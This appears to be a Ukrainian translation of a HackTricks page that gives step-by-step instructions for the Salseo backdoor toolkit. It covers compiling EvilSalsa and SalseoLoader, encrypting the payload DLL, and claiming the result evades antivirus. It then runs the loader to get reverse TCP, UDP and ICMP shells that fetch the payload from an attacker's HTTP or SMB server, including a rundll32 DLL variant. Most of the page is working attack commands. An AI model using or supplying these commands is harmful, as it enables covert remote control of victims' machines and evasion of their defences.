10 KiB
Salseo
{% hint style="success" %}
Вивчайте та практикуйте взлом AWS: Школа взлому AWS для Червоної Команди (ARTE)
Вивчайте та практикуйте взлом GCP: Школа взлому GCP для Червоної Команди (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поширюйте хакерські трюки, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Компіляція бінарних файлів
Завантажте вихідний код з GitHub та скомпілюйте EvilSalsa та SalseoLoader. Вам потрібно мати встановлений Visual Studio для компіляції коду.
Скомпілюйте ці проекти для архітектури віконної системи, на якій ви плануєте їх використовувати (якщо Windows підтримує x64, скомпілюйте їх для цієї архітектури).
Ви можете вибрати архітектуру всередині Visual Studio в лівій вкладці "Build" в "Platform Target".
(**Якщо ви не можете знайти ці параметри, натисніть на "Project Tab", а потім на "<Project Name> Properties")
Потім скомпілюйте обидва проекти (Build -> Build Solution) (У логах з'явиться шлях до виконуваного файлу):
Підготовка Задніх Дверей
По-перше, вам потрібно закодувати EvilSalsa.dll. Для цього ви можете використати скрипт Python encrypterassembly.py або скомпілювати проект EncrypterAssembly:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Ok, зараз у вас є все необхідне для виконання всієї справи Salseo: закодований EvilDalsa.dll та бінарний файл SalseoLoader.
Завантажте виконуваний файл SalseoLoader.exe на машину. Їх не повинно виявити жодне Антивірусне програмне забезпечення...
Виконання backdoor
Отримання оберненого оболонкового з'єднання TCP (завантаження закодованого dll через HTTP)
Не забудьте запустити nc як прослуховувач оберненої оболонки та HTTP-сервер для обслуговування закодованого evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Отримання зворотньої оболонки UDP (завантаження закодованого dll через SMB)
Не забудьте запустити nc як прослуховувач зворотньої оболонки та сервер SMB для обслуговування закодованого evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Отримання зворотньої оболонки ICMP (закодований dll вже всередині жертви)
На цей раз вам потрібен спеціальний інструмент у клієнта для отримання зворотної оболонки. Завантажте: https://github.com/inquisb/icmpsh
Вимкнення відповідей ICMP:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Виконати клієнт:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
У жертви виконаємо річ сальсео:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Компіляція SalseoLoader як DLL, експортуючи головну функцію
Відкрийте проект SalseoLoader за допомогою Visual Studio.
Додайте перед головною функцією: [DllExport]
Встановіть DllExport для цього проекту
Інструменти --> Менеджер пакетів NuGet --> Керування пакетами NuGet для рішення...
Пошук пакету DllExport (за допомогою вкладки Огляд), і натисніть Встановити (і прийміть спливаюче вікно)
У вашій папці проекту з'явилися файли: DllExport.bat та DllExport_Configure.bat
Деінсталюйте DllExport
Натисніть Деінсталювати (так, це дивно, але повірте мені, це необхідно)
Вийдіть з Visual Studio та виконайте DllExport_configure
Просто вийдіть з Visual Studio
Потім перейдіть до вашої папки SalseoLoader та виконайте DllExport_Configure.bat
Виберіть x64 (якщо ви збираєтеся використовувати його всередині x64-боксу, це було моє випадок), виберіть System.Runtime.InteropServices (в межах Простору імен для DllExport) та натисніть Застосувати
Відкрийте проект знову за допомогою Visual Studio
[DllExport] більше не повинен бути позначений як помилка
Побудуйте рішення
Виберіть Тип виводу = Бібліотека класів (Проект --> Властивості SalseoLoader --> Додаток --> Тип виводу = Бібліотека класів)
Виберіть платформу x64 (Проект --> Властивості SalseoLoader --> Збірка --> Ціль платформи = x64)
Для побудови рішення: Build --> Build Solution (У консолі виведення з'явиться шлях до нового DLL)
Протестуйте згенерований Dll
Скопіюйте та вставте Dll туди, де ви хочете його протестувати.
Виконайте:
rundll32.exe SalseoLoader.dll,main
Якщо помилка не виникає, ймовірно, у вас є функціональний DLL!!
Отримайте оболонку, використовуючи DLL
Не забудьте використовувати HTTP сервер та встановити nc прослуховувач
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
Вивчайте та практикуйте взлом AWS: Школа взлому AWS для Червоної Команди (ARTE)
Вивчайте та практикуйте взлом GCP: Школа взлому GCP для Червоної Команди (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.